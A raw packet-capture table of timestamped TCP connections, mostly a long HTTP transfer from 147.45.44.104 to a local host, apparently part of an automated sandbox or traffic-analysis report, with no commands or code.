Sep 27, 2024 01:49:56.171812057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171825886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171842098 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171858072 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171865940 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171875000 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171888113 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171894073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171927929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171932936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171943903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171958923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171976089 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171991110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172005892 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172008991 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172008991 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172036886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172086000 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172132015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172146082 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172147989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172184944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172224045 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172240019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172255993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172271013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172275066 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172283888 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172286987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172301054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172316074 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172322035 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172352076 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172359943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172375917 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172389984 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172405005 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172419071 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172436953 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172451973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172477961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172494888 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172508955 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172519922 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172519922 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172626019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172641993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172657967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172673941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172678947 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172688961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172703028 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172704935 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172719955 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172724009 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172734976 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172784090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172825098 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172842026 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172856092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172867060 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172867060 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172872066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172885895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172885895 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172903061 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172916889 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.172921896 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172940016 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172955036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172969103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172982931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.172997952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173001051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173001051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173032999 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173048973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173063993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173079014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173088074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173088074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173094988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173110008 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173125029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173139095 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173142910 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173142910 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173156023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173171997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173187017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173202038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173217058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173228025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173228025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173228025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173228025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173233032 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173249960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173264980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173269987 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173280001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173294067 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173310041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173324108 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173327923 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173327923 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173338890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173355103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173371077 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173373938 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173490047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173507929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173521042 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.173547029 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.173547029 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.185717106 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:56.185717106 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:56.185739994 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:56.185750961 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:56.195672989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195715904 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195751905 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195768118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195782900 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195799112 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195815086 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195832014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195846081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195852995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195863008 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.195863008 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.195863008 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.195868015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195879936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.195883989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195899963 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.195916891 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.196064949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.198018074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.198359966 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.198367119 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.199436903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199487925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199501038 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199599028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199635029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199651003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199651003 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199677944 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199697971 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199713945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199729919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199744940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199759960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199764967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199775934 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199790001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199805021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199820042 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199836016 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199841976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199841976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199841976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199891090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199912071 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.199965954 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.199980974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200014114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200036049 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200036049 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200042009 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200073957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200089931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200104952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200119972 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200134993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200151920 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200166941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200167894 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200167894 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200330019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200349092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200366974 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200383902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200400114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200414896 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200419903 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200429916 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200443983 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200470924 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200485945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200521946 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200536013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200541973 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200541973 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200552940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200568914 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200582027 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200586081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200601101 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200615883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200634956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200637102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200637102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.200659037 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.200715065 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.206674099 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.206762075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206778049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206814051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206831932 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206861019 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.206876040 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206898928 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206913948 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206923008 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206935883 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.206963062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206978083 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.206979036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.206979036 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.206994057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207009077 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207055092 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207078934 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207087040 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207094908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207132101 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207139015 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207149029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207164049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207180023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207195997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207201958 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207211971 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207221031 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207226992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207242012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207261086 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207292080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207307100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207331896 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207340002 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207375050 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207403898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207421064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207436085 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207457066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207472086 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207500935 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207509041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207525015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207540989 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207542896 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207580090 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207596064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207617044 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207617044 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207632065 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207647085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207683086 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207699060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207714081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207731962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207747936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207762957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207771063 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207771063 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207779884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207794905 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207811117 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207827091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207844019 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207858086 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207874060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207887888 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207895041 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207895041 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207895041 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207895041 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207904100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207917929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207932949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207942963 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207948923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207964897 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.207968950 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.207981110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.208071947 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.210827112 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.210834026 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.210846901 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.268462896 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.268496990 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:56.270667076 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.272888899 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.272896051 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:56.287961006 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.287978888 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.287996054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288039923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288054943 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288073063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288101912 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.288101912 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.288119078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288161993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288177013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288182020 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.288192987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288208961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288224936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288239956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288252115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.288252115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.288256884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.288270950 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.291830063 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.291846991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.291862965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.291892052 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.291918993 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.291934967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.291946888 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.291950941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.291974068 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292000055 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292017937 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292033911 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292051077 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.292058945 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.292077065 CEST	49743	80	192.168.2.8	147.45.44.104
